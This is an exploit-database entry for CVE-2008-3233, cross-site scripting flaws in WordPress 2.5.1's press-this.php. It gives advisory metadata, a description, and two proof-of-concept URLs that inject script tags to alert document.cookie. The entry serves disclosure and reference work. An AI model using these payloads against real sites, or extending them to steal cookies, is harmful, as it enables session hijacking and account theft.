[] NeoSense

WordPress Core 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2008-07-15 
date_updated: 2017-05-04 
verified: 1 
codes: CVE-2008-3233;OSVDB-47938 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comWordPress-2.5.1.zip

source: https://www.securityfocus.com/bid/30238/info

WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to WordPress 2.6 are vulnerable.

http://www.example.com/wp/wp-admin/press-this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/wp/wp-admin/press-this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E